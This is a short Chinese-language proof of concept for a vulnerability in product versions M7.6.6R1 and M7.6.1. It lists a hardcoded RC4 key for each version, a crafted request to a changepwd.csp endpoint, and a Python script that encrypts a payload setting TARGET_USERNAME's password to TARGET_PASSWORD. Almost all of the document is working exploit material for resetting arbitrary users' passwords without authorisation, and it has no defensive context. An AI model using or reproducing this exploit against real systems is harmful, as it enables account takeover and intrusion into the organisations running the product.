漏洞范围

已知M7.6.6R1 M7.6.1 其他版本有待测试

漏洞POC

M7.6.6R1 key 为 20181118 M7.6.1 key 为 20100720``` https://<path>/por/changepwd.csp

sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN

计算RC4_STR_LEN脚本
from Crypto.Cipher import ARC4
from binascii import a2b_hex

def myRC4(data,key):
    rc41 = ARC4.new(key)
    encrypted = rc41.encrypt(data)
    return encrypted.encode('hex')


def rc4_decrpt_hex(data,key):
    rc41 = ARC4.new(key)
    return rc41.decrypt(a2b_hex(data))
key = '20100720'
data = r',username=TARGET_USERNAME,ip=127.0.0.1,grpid=1,pripsw=suiyi,newpsw=TARGET_PASSWORD,'
print myRC4(data, key) 
```